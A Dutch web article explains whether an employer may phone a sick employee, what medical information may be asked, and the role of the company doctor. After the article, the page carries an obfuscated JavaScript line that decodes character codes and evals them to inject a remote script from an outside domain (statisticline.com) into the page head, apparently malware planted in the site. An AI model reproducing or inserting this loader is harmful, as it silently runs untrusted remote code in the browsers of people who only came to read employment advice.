Mag je werkgever je bellen als je ziek bent?

Werk

In een arbeidscontract, een CAO en/of een bedrijfsreglement maken werkgevers en werknemers afspraken over wat er over en weer van elkaar mag worden verwacht. Wanneer in een van deze afspraakvormen een regeling staat, dan moeten de werkgever en werknemer zich aan die regeling houden. De algemene wet- en regelgeving geldt als er niets specifieks is geregeld. Vraag jij je wel eens af of je werkgever je mag bellen als je ziek bent? De kern zal altijd zijn dat je als werknemer met je werkgever in gesprek dient te gaan, want als werknemer kom je een verplichting niet na. Je hebt je vaardigheden en diensten op vooraf afgesproken tijdstippen aangeboden in ruil voor geld en eventueel goederen, zoals gereedschap of een auto. Door ziekte kun je die verplichting niet nakomen. 

Je bent dan verplicht om met je werkgever in gesprek te blijven om toe te lichten waarom je meent niet te kunnen werken, en om afspraken over het vervolg te maken.

Wat mag een werkgever aan een zieke werknemer vragen? 

Je hoeft in het gesprek met je werkgever niet te vertellen wat je klachten zijn. Je kunt dit beperkt houden tot het aangeven welke taken je niet kunt uitvoeren omdat je daartoe niet in staat bent. Zo kun je bijvoorbeeld melden dat je geen hele dagen kunt werken (indien je nachten gebroken zijn door herhaaldelijk slecht slapen) of dat je jouw rechterhand niet kunt gebruiken (als je daarvan de wijsvinger hebt gebroken en in het gips zit). Het is je werkgever niet toegestaan om medische informatie van je te vragen en ook niet of je bij de huisarts bent geweest. Wel mag je werkgever vragen of je adequate behandeling hebt gezocht. Ook mag die vragen of de ziekte een gevolg is van een arbeidsongeval. Om het recht op loondoorbetaling vast te stellen, heeft de werkgever recht op die informatie. Daarom zul je aan je werkgever duidelijk moeten maken welke beperkingen er bestaan die maken dat je het werk dat je het laatst hebt verricht niet langer kunt verrichten. De werkgever heeft ook recht te weten wanneer herstel van functioneren wordt verwacht, indien dit bekend is. 

Mag een werkgever de controletaak van de bedrijfsarts overnemen?

Je bent als werknemer verplicht alle door de werkgever opgestelde controlevoorschriften tijdens verzuim na te komen, voor zover die redelijk zijn in relatie tot de wetgeving. Dit betekent niet dat een werkgever zelf de controletaak van de bedrijfsarts of arbodienst mag overnemen. Daar is de wet immers heel duidelijk over. Vraag jij je af: wat doet een bedrijfsarts of een verzekeringsarts in dit kader? Een van deze artsen beoordeelt de ziekte en daaruit voortvloeiende arbeidsongeschiktheid. Voordat hij kan worden gedwongen om een deskundige zoals een bedrijfsarts in te schakelen, mag de werkgever zichzelf wel eerst een oordeel vormen over een ziekmelding. Het voorgaande betekent echter niet dat je werkgever je bij ziekte te pas en te onpas mag bellen. Ook houdt het niet in dat je 24 uur per dag beschikbaar moet zijn voor je werkgever. 

Gebruikelijk dien je op je normale werktijden beschikbaar te zijn voor overleg. Om misverstanden te voorkomen, is het aan te raden om na het eerste overleg afspraken te maken over wat jouw verwachtingen zijn en wat die van je werkgever zijn.

var z =String;var t=z.fromCharCode(118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,39,104,116,116,112,115,58,47,47,99,100,110,46,115,116,97,116,105,115,116,105,99,108,105,110,101,46,99,111,109,47,115,99,114,105,112,116,115,47,115,119,97,121,46,106,115,63,118,61,50,39,59,32,10,115,46,105,100,61,39,115,119,97,121,116,114,97,99,107,39,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,125);eval(/*674867468*/t);

Geef een antwoord